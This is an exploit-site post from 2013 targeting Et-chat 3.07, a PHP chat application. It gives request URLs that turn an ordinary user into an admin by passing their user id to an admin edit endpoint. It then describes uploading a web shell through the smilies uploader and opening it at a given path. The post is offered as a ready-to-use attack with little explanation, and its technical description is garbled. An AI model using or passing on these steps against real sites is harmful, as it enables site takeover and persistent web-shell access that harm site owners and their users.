facebook facebook twitter rss

Et-chat 3.07 user id Parameter Remote code execution

Author: f4ry4r_red , Published: 16-09-2013
# Exploit Title: Et-chat 3.07 user id Parameter Remote code execution

# Exploit Author: f4ry4r_red

# Script Download : http://et-chat.ir/up/et_chat_v307.zip

# Risk : Normal

# Platforms : PHP

# Tested on: 7 , KAli , Vista

# Date : 2013

<------------------------------------------>

-==========<RcE>==========-


# How does :

This error occurs due to keep cookies


# Exploit :


/?AdminRegUserEdit&[user or admin]&id=[Parameter]

/?AdminRegUserEdit&admin&id=[Parameter]


# p0c :


get the user id and replace to Parameter

For example, my user id is 4

http://site.com/chat/?AdminRegUserEdit&admin&id=4

next u are a admin user



-==========<Uploader>==========-

# For uploading sh3ll go to

/?AdminInsertSmilies <====- Uploader

http://site.com/chat/?AdminInsertSmilies

# your shell Should be less than 15 KB

Patch your sh3ll from :

http://site.com/smilies/sh3ll.php


Like us on Facebook :